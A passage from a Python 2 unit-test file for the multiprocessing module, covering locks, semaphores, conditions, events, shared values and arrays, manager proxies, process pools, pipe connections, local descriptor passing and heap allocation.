self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
self.skipTest("requires 'queue.task_done()' method")
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.daemon = True
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), range(10))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_accepts_long(self):
arr = self.Array('i', 10L)
self.assertEqual(len(arr), 10)
raw_arr = self.RawArray('i', 10L)
self.assertEqual(len(raw_arr), 10)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
self.assertRaises(ValueError, multiprocessing.Pool, -1)
self.assertRaises(ValueError, multiprocessing.Pool, 0)
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test that manager has expected number of shared objects left
#
class _TestZZZNumberOfObjects(BaseTestCase):
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
multiprocessing.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
debug_info = self.manager._debug_info()
if refs != EXPECTED_NUMBER:
print self.manager._debug_info()
print debug_info
self.assertEqual(refs, EXPECTED_NUMBER)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, object)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
test_support.gc_collect()
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.start()
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
with open(test_support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test_support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
with open(test_support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test_support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
#
# Test of sending connection and socket objects between processes
#
"""
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
multiprocessing.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
"""
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# XXX There should be a better way to release resources for a
# single block
if i % maxblocks == 0:
import gc; gc.collect()
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
#thresholds = gc.get_threshold()
#self.addCleanup(gc.set_threshold, *thresholds)
#gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
